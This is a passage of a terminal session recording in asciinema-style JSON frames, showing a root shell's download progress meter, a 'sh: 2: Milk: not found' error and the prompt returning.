[102.610967, "o", "\r  0     0    0     0    0     0      0      0 --:--:--  0:00:01 --:--:--     0"]
[103.53334, "o", "\r  0     0    0     0    0     0      0      0 --:--:--  0:00:02 --:--:--     0"]
[103.798802, "o", "\r  0 1629k    0 15011    0     0   6279      0  0:04:25  0:00:02  0:04:23  6278"]
[104.4118, "o", "\r100 1629k  100 1629k    0     0   542k      0  0"]
[104.412064, "o", ":00:03  0:00:03 --:--:--  542k\r\n"]
[104.507973, "o", "sh: 2: Milk: not found\r\n"]
[104.510599, "o", "\u001b[?2004h\u001b]0;root@6e484a70cb35: ~\u0007root@6e484a70cb35:~# "]
[104.510629, "o", "\r\n\u001b[?2004l\r"]
[104.510919, "o", "\u001b[?2004h\u001b]0;root@6e484a70cb35: ~\u0007root@6e484a70cb35:~# "]
